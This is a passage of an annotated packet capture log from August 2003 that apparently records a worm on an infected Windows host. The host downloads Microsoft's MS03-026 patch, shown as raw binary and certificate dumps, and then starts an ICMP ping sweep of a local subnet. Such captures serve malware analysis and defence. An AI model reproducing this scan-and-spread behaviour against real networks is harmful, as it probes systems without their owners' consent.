0x6BE55151 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.697552 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:176 IpLen:20 DgmLen:271 DF ***AP*** Seq: 0x734A91C3 Ack: 0x6BE55151 Win: 0xFAF0 TcpLen: 20 GET /download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/Windows XP-KB823980-x86-ENU.exe HTTP/1.0..Accept: */*..User-Agent: Mozil la/4.0 (compatible; MSIE 6.0; Windows NT 5.1)..Host: download.mi crosoft.com..Connection: Keep-Alive.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.698557 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:2649 IpLen:20 DgmLen:40 ***A**** Seq: 0x6BE55151 Ack: 0x734A92AA Win: 0x3F19 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.843183 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:2905 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE55151 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 HTTP/1.0 200 OK..Age: 11732..Accept-Ranges: bytes..Date: Tue, 19 Aug 2003 04:01:40 GMT..Content-Length: 1291040..Content-Type: a pplication/x-msdownload..Connection: keep-alive..Server: Microso ft-IIS/5.0..Last-Modified: Sat, 05 Jul 2003 20:18:54 GMT..ETag: "202749a83243c31:8e0"..Via: 1.1 csc0g02prb (NetCache NetApp/5.3. 1R4D1)....MZ......................@............................. ..................!..L.!This program cannot be run in DOS mode.. ..$.......+.Dlo.*?o.*?o.*?o.+?=.*?..3?`.*?..o?n.*?..6?..*?...?n. *?Richo.*?........PE..L....'.>.................V...........A... ........... .................................................... ...................m..........H............... ...........p!.... ........................................... ..d................. ...........text....U... ...V.................. ..`.data...(..... .......Z..............@....rsrc...H........<...\..............@. .@.............................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ...........p...p...p...p..zp..bp...o...o...o...p..:p..Pp........ ......Dt..Tt...r...p...p...q...q.."q..4q..Lq..`q..pq =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.843295 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3161 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE55705 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 ..~q...q...q...q...q...q...q...r...r.."r..0r..<r..Jr..br..pr...r ..4t...r...r...r...r...r...s...s..,s..Bs..Vs..ns..~s...s...s...s ...s...s...s...t.."t..ft.......u...u.......t...t...t...t...t...t ...t...u.......o...o...o...o...o......\u..Fu..,u.."u............ ...........'.>.............#..................Z.......$shtdwn$.r eq...._SFX_CAB_SHUTDOWN_REQUEST...InitiateSystemShutdownExA...ad vapi32.dll....WFP_IDLE_TRIGGER....DecryptFileA....temp\ext....%0 2x....%s..backofficestorage...cdtag.1._SFX_CAB_EXE_PATH...\updat e\update.exe.................................................... ......................................................>...^...~. ..........~......................................../...?..._.... ................................................................ ......................................................NB10.....' .>....sfxcab.pdb..U..Q........t.SV3.SSSP..L ..S.E.P.....Vh@....5 ......H ....tH9u.uC.=@...Sdwnu7..K....u5..K...@.=D.........O...u ...H......?u..%K........K....^[..SV.t$...W.H...@..u..|$.+....... .8..........z.\t...\B.D$..p...@..u.+..t$..H................._^.. [....t$.j..5......P ...V.t$.V..T ..95(...^u..%(....3...|$...D$.u ..........t$.j.P.t$...L ..+......U......E....M.u..E...0@.+V3.j.^ ....0..A..u..E.I;..E.^r.....@I.U.;.s.. .....U.....V.u...... t..u ..u.V.5 ......!....u:.l....E...!...E..E..E.P.u..u.j.Vj.h.0....X ....u..u.V.R...^....SUVWh......p ...(...3.;.t.P..T ...-(....5... ...l ......../.F.;.t&P..h ....u...d .....t....t.j.U. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.843419 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3417 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE55CB9 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 v....n..6;.u..5.....-` ........-.F...t$P....u...d .....t....t.j. j..v....f...6;.u.........t.P..T ..............V....u...d .....t. ...t.j.j.V..h......\ .._^][.U...}..tj.}..tA.}.....uW.=8.....E..d ...t.j.P.. !..h.....p.....| ...5t.....x ...5.}..t.............t! j.P..t ....3....%d....j..u....!..3.@]....D$.V......... t....u.@. ...W.y...A..u.+.A......_r.3..4...."u#...."t ..F@....u..... t.... t...F@....u..&.3.@^...3.j...Z..t...5 .......Ju....@...A......r.. .T$....D$..L$.t.VW..1...3..4.@......3.AJu._^...U........S3.Sh... .j.Sj.h.....u.... ......E.......VW.=H ..S.M.Q.....V......QP..... .....9u.......f......MZu@SS..(....u...L ..;.(.....x...S.E.PV.... ..P.u.......^...9u...U.........PE....E...f..........6...9]...-.. .9]...$....}............u.j..5....... ....;..u.......SS.u..u...L ..;E.......S.E.P.u.V.u............M.9M..........M.....=.8.u0j.Y ..!....3...u .H.....M.r.;M.w.QPj..Z.....t..E.@.M..}...E.s..o.... M....t..}......M.....FA9].u..M..}.....Q..A......;..U..E...0....= . .....M..E......;..U.......f...........B..........R.........M.. .;M..M........M...f.\F..E...@.j...f.\A.X+.f.._.+.f..X.+.f..F.+.f ..S.+..E.PSSSj.VSSf.._...;..E.......9].u|Pj..5....... ..;..E.toS S.u.Pj.VSS..SS.u.... ....uJ.E.PSSSj..u.SS..;..E.t39].u.Pj..5.... ... ....;.t"SS.u.Vj..u.SS..V.u.... ...M........u...T .._^[....U. .....E...E..E.V3.+..E......U.t.HuY!u....E......E.Pj(j...T!....|; .}...E.t...t..0P.u..E.VPj..u...X!.....u.|...\!..3.@....\!..3.^.. ..U..QV3.9u.t:.E.Pj(j...T!....|(VVV.u.V.u...X!.....u =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.844179 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:178 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BE55CB9 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.849443 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3673 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE5626D Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 .|...\!..3.@....\!..3.^....3...QU3.UUh.!..... ..........VW.....V h.!..h.....*...Uh....j.Uj.h....V... .............toS.@...3.U.... ......D$.P.....WSR..@...Sdwn..D.........H.......... ....[t.9|$.u .Vh.!..... .....5......T ........._^]Y.U.l$.......V.u|...u...d . ....= ....uL......Ph....V.f....e..h.....E.Ph... .5 ......!..h... ..E.P......P.5d.....$!.........u.F.=$....t.h....... ...%$....V.. . ...j.h.&..j.jd.5 ......!...%d......t.j..9......U.l$.......SVh. !..3.Sh.....E`....... ....;.t.h`...V... ..V..T ....9]tt.h`.....h .'....| ...E`P.EPPSj..0...........Wh.!..... ..;..Ett"h.!..P... . .;.t..u|.ul.upS.uxS.....ul.upSSS... ....;........5D ...E.P.E.... ....}..v..E.P.E........EL@tlh..........P... ....tV......j\P..8!. .YYSh....j.Sj..X.h..........P... .......t.V... ..V....T ..;.t.j. ..P!....9]tt..ut... ...EPP......._^[..d.....t$.j..5....... ....u .j.......Vj.h....j.j.j.h.....t$ ... .......u.P.t...j.j..5....V.. L ....^.U..j..E.P.u..u..u...H ....u.j..<....E.].U..j..E.P.u..u.. u.... ....u.j.......E.].U.....W.u..e...e...e...e...e..3.WWWWWWh ...j j..E.P.E....$ ....t..E.Pj(... ..P... ....u.3......S.. ..V. E.Ph....h ...j..u.....u.3.......5 ...... ....V.....;.Y.M...tO... 5 ...............E.Ph....h ......j....u.....t..5 ...... ....V.i. ....Y.M...u.j.........5 .................3...@^[_.....D$..H...@. .u.V+..p.WV.....Y...t$................._^...U....(....E....SV..I ...-..........Hu...E.H......H..).....kt.3..+...Wh..........Ph... .5 ...3..........!...u.j.3.Y.}..........E........E. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.849534 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:3929 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BE56821 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 3..E.GP.u..}....!..;.t%......QP...!....t.......PSj.jlV..,!..SSj( V..(!...._..................Ph....j.jl.u...,!........P.....P.\h. .........Ph... .5 ......!........P3.Sj..u...(!...5,!........PSj. jg.u...h....Sj.jl.u.....j..u....!..3.@^[.......SUVWh.........V3. S... .....H...@:.u.+..........H..9\t...;.w.P.....V.4....K...... .....l$.3..E.< t.<.t.<"u.<"u.3.AE..;..l$.t.8]...t..8"t.@8.u..... ...H...@:.u.+..D(....... t....u...H;.s...4......\$........p...@ :.u.+..T.....:.t.J;.w..2...p...@:.u.+..H..D$.................... ......4.....,....!..8]............. .. :........n..q...3.:.t.EF. ..U..... .. :.t.3.:........}...\$.uC9\$.v=3.9\$..D$.....v)..-... .........0.... .. :.......G;|$.r.3..l$..E.< t.<.t.:.ud.t$...+... ......`..............3.9\$...`.....u$.L$.....................L$. 3....`...R... ....t$..4....t$.F8..t$.........3..\$..o....-,....- ,......P...@:.u.+...........x..w.u.......3...... @.. -X u..0.... . -X:u..0....E.P.+.....tJ3.@.. -U u.. ..... -Q u..8.... ..... -S u..h..... -S:u..h...OE;.w._^][....jR.I....Vj......Y.t$....B.... F..D$......0^...U..3.9E.V...W.}..?....E.t1.>\u&.u..&.W... ....t. Wh..........E.......\F.>.u..E._^]...U........V.u...W.P...@..u.+. .H.............................x.\_^t...\.`...u........u.P.Q.... .tO......P... .....t=..t9h.!..... ....t%h."..P... ....t.j....... Q....u...d ..3.@..3.....U.l$.......SW3..=......E..Epc:\..Ewc.}\. }`.}d.E,.....E0.}4.}X.....t.WWS............. ......EhP.ETP.E8P.. .....u.j......Vj..E.P... ....t}j.h..........P... ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Download the patches for the MS03-026 vulnerability 08/19-15:17:14.564592 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:32092 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BF8EA3E Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 ................................................................ ............................. .......0.....*.H..........0......1 .0...*.H.......0g..+.....7....Y0W03..+.....7...0%.... .....<.<.< .O.b.s.o.l.e.t.e.>.>.>0 0...*.H..........~b^C.s;;.m._.......0... 0..%..J..8..Y..]s_.]..0...*.H........0..1.0...U....VeriSign Trus t Network1.0...U....VeriSign, Inc.1,0*..U...#VeriSign Time Stamp ing Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 VeriSign , Inc.0...970512000000Z..040107235959Z0..1.0...U....VeriSign Tru st Network1.0...U....VeriSign, Inc.1,0*..U...#VeriSign Time Stam ping Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 VeriSig n, Inc.0..0...*.H............0........ .h|,-...........W.S.u..3* ....[4.........Z.........%.}X.sjx.q...X.).X^...-b.X...q.."X/.... .6....MJ..;".V.~!.l..JG.j..6...-..9......0...*.H............aU.> {...~..."....+[.D..x..~...r..Y......L.Na....F=P4..pV..*....c.yi. s...(......].........(..y).....gBH.....a..S...s?...O..U...cc0... 0..k........zm\ob.O...C....0...*.H........0..1.0...U....VeriSign Trust Network1.0...U....VeriSign, Inc.1,0*..U...#VeriSign Time Stamping Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 Ver iSign, Inc.0...010228000000Z..040106235959Z0..1.0...U....VeriSig n, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://www.verisign.com/rpa (c)011'0%..U....VeriSign Time St amping Service0.."0...*.H.............0.........za.....c.+.a.... ....=.'...9...)..fH..O..O...^./......{.!....N....X.c =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.564667 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:32348 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BF8EFF2 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 -...)..p.P....@..%.BU.........1....L.$*.........M.......h.aX.r.. 0HO./oc ....{.K.(..h...@.F:..?6.L.TBZze{....GT..=......3...*...^ :......u..k.=.`.B..O.[.?"1....s.....+.F.Lm..P..K*x..t=..,G1..... ...0..0@..+........40200..+.....0..$http://ocsp.verisign.com/ocs p/status0...U....0.0D..U. .=0;09..`.H...E....0*0(..+.........htt ps://www.verisign.com/rpa0...U.%..0...+.......0...U........0...* .H............-.Oc`,...$.R.....g..#..F...M..|z 02.h...2....;..'{ >....!.......@W..%....j..;..#..)]@U..S..6:9e.ss.2......<.E....$. .c........A.j.0...0..............<<...>.c..@0...*.H........0p1+0 )..U..."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft C orporation1!0...U....Microsoft Root Authority0...970110070000Z.. 201231070000Z0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0. ..U....Microsoft Corporation1!0...U....Microsoft Root Authority0 .."0...*.H.............0............p.;.N.(..x^0....%_...L..... >|Q....`2k.Bdy..v.T.........f..kzb#..<........-f..h&..:,...X&.F. .>8.,.(9..I.B.....lUa..|.`-wL...d;.P.1.$.....+..=.c.`X.e..7R.... ......UE....:.T.N...zmtN.....(!.W.`i7.K..<V.[..f.....VW..;^..w.. ............r\<....."0..... w...........0..0....U.....0....[.p.i r.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0. ..U....Microsoft Corporation1!0...U....Microsoft Root Authority. .....<<...>.c..@0...*.H.....................5...$.w..\`2....>... ..:.!..W.,..G.b....;;Z.6Ti.$m?.....|.1.=..pj...O.i...C..Z O.b{.. ..+7%-.e...%.c..T..!....R.nC2......gl.Q...R....0. 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.564795 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:32604 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BF8F5A6 Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 ...).M.........[....W.eI.RT...(.......~....7,.z..w.v...j?..6..A. .5j.j.5......E..Z38nM..b......T?F..U.p..:..u....0...0..........j ..O......0..`..0...*.H........0p1+0)..U..."Copyright (c) 1997 Mi crosoft Corp.1.0...U....Microsoft Corporation1!0...U....Microsof t Root Authority0...990701070000Z..051015070000Z0..1.0...U....US 1.0...U....WA1.0...U....Redmond1.0...U....Microsoft Corporation1 +0)..U..."Copyright (c) 1999 Microsoft Corp.1806..U.../Microsoft Windows Verification Intermediate PCA0.. 0...*.H.............0. ..........j6.{?.......`QQ`o..0.......Wj.....T-.f.q.?.....N|.m.R. ..0..5.-......#..-9`..c..*..U;.<..yYmF.......\U=..a.~7....8`.$.. O..(5..FN!..?7.F....O......<..qc.%t.!m...m.IJ..2..}......f.... . $d..bt..=.../M.t../3.ay......u...be.t.......gx#E|....@.....+.... .]............0...0...U.%..0...+.....7.....+.......0....U.....0. ...[.p.ir.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft C orp.1.0...U....Microsoft Corporation1!0...U....Microsoft Root Au thority......<<...>.c..@0...+.....7.......0...+.....7.......S.u. b.C.A0...U.......F0...U.......0....0...*.H.............c.9d..... 6c#jL.Em..9L.._...K.D.b...N....&..i>/......H...#g.4)....zh...... T.Y<.&.e...x..hy.9.........O..1.&....G....$....o.a.nO.69....6gK. ........!Z@;.....8...........{%..........M....W...J.,.Q..9.....- .@\$O7t^>.....,...`)..-...... ...,I.p...P.f:=.:.1..._.W0...0.... ......a.;q.....'0...*.H........0..1.0...U....US1.0...U....WA1.0. ..U....Redmond1.0...U....Microsoft Corporation1+0).. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.564919 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:32860 IpLen:20 DgmLen:1500 ***A**** Seq: 0x6BF8FB5A Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 U..."Copyright (c) 1999 Microsoft Corp.1806..U.../Microsoft Wind ows Verification Intermediate PCA0...020529193240Z..030729194240 Z0..1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U. ...Microsoft Corporation1+0)..U..."Copyright (c) 2002 Microsoft Corp.1'0%..U....Microsoft Windows XP Publisher0.."0...*.H....... ......0.........H....@).I.ir... R.3...........g..N...........'c. .Q9.7...M.b...... 5.=.V..Lj.....N..I..d.......GH.N5...g.S.B..R.. ..Q*....U......Jf.dw...r3...n.r@..nJ.......I5v8H+...d...&....... {............F..."'.+.!....S........h.B.h.U..:.eO..........j.d.. ...,.!......+n.........,0..(0...U...........0...U.%..0...+...... ...+.....7...0....U.#...0........N................t.r0p1+0)..U.. ."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft Corpora tion1!0...U....Microsoft Root Authority..j..O......0..`..0I..U.. .B0@0>.<.:.8http://crl.microsoft.com/pki/crl/products/WindowsPCA .crl0...*.H..............Y.Mz..T~.A.<...e.....d...^..}v_......{. .6o\.7.. .-...s........r.I.6.>..u........utj.m.[G.7....g...mjP!. ....r..i!.8^...R...9..U..2.../..._.7.Y.Y....u....h.S....n...o*"p ..:.}.f..=.........=o..N....>.ss.........(..7....P.p..W.....G.I. f,q.....h.....*..d..D...1...0......0..0..1.0...U....US1.0...U... .WA1.0...U....Redmond1.0...U....Microsoft Corporation1+0)..U..." Copyright (c) 1999 Microsoft Corp.1806..U.../Microsoft Windows V erification Intermediate PCA..a.;q.....'0...*.H...........0...*. H......1...+.....7...0...+.....7...1.0...+.....7...0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.565022 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:33116 IpLen:20 DgmLen:1237 ***AP*** Seq: 0x6BF9010E Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 ...*.H......1....l..#|.....D.W..0h..+.....7...1Z0X.:.8.W.i.n.d.o .w.s. .X.P. .H.o.t.f.i.x. .-. .K.B.8.2.3.9.8.0....http://www.mic rosoft.com0....+.....7..1..0.....0... 0...+.....7..0....0...appl et0.0...0...+.....7..0...........0...+.....7.......!0...+.....7. .0.....................0...+.....7..0.......0...0...+.....7..0.. ..........0...*.H............Ww!|c.>........H.T.....W\W^q..g.f.. ..).O..t......+d..z}.~.gn.S.=.3.aIF..(..s.".$I..o..w.6fO..~..n.w .-......V.d...].....N.3.)....d....q....h...........\...[Q ..v... .(.M.EK..q).M..Z..+...W.5....W..Pj...i...9.:.0j...d....5<e(;d... j\.....H...%t'..<..h..G..Uj.....L0..H..*.H......1..90..5...0..0. .1.0...U....VeriSign Trust Network1.0...U....VeriSign, Inc.1,0*. .U...#VeriSign Time Stamping Service Root1402..U...+NO LIABILITY ACCEPTED, (c)97 VeriSign, Inc....zm\ob.O...C....0...*.H........ Y0...*.H......1...*.H......0...*.H......1...030705201853Z0...*.H ......1....=U.iV.....x`j.X0...*.H.............B....LyU.W9....s.. |....X.?.&....>.*\..}..y.....54......'J.Jc...c..........G....... ..H[.....o^.R.}D;.8..*.......6...sO.&......c..Y..M.Q...w.L.2.... G...._..>..\..e....Br..@....D........XG=.=..!M....C.1.i...#A...~ .......4.#........AQp.E.9..x...z.....n....9v_ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.565309 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:731 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BF8D922 Win: 0xF53C TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.565357 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:732 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BF8E48A Win: 0xE9D4 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.565412 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:733 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BF8EFF2 Win: 0xDE6C TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.565966 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:734 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BF8F5A6 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.566609 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:735 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BF9010E Win: 0xEF88 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:14.567416 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:736 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BF905BB Win: 0xF98B TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:24.802296 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:33372 IpLen:20 DgmLen:40 ***A***F Seq: 0x6BF905BB Ack: 0x734A92AA Win: 0x4000 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:24.802686 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:737 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A92AA Ack: 0x6BF905BC Win: 0xF98B TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:29.540836 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:738 IpLen:20 DgmLen:40 DF *****R** Seq: 0x734A92AA Ack: 0x6BF905BC Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Finish downloading the patch. After two minutes, start the ICMP scan 08/19-15:19:22.148515 192.168.20.2 -> 192.168.0.0 ICMP TTL:128 TOS:0x0 ID:27 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:256 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.154455 192.168.20.2 -> 192.168.0.1 ICMP TTL:128 TOS:0x0 ID:28 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:512 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.164797 192.168.20.2 -> 192.168.0.2 ICMP TTL:128 TOS:0x0 ID:29 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:768 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.174535 192.168.20.2 -> 192.168.0.3 ICMP TTL:128 TOS:0x0 ID:30 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:1024 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.184530 192.168.20.2 -> 192.168.0.4 ICMP TTL:128 TOS:0x0 ID:31 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:1280 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.194525 192.168.20.2 -> 192.168.0.5 ICMP TTL:128 TOS:0x0 ID:32 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:1536 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.205040 192.168.20.2 -> 192.168.0.6 ICMP TTL:128 TOS:0x0 ID:33 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:1792 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.214541 192.168.20.2 -> 192.168.0.7 ICMP TTL:128 TOS:0x0 ID:34 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:2048 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.224469 192.168.20.2 -> 192.168.0.8 ICMP TTL:128 TOS:0x0 ID:35 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:2304 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.234570 192.168.20.2 -> 192.168.0.9 ICMP TTL:128 TOS:0x0 ID:36 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:2560 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:19:22.244549 192.168.20.2 -> 192.168.0.10 ICMP TTL:128 TOS:0x0 ID:37 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:2816 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+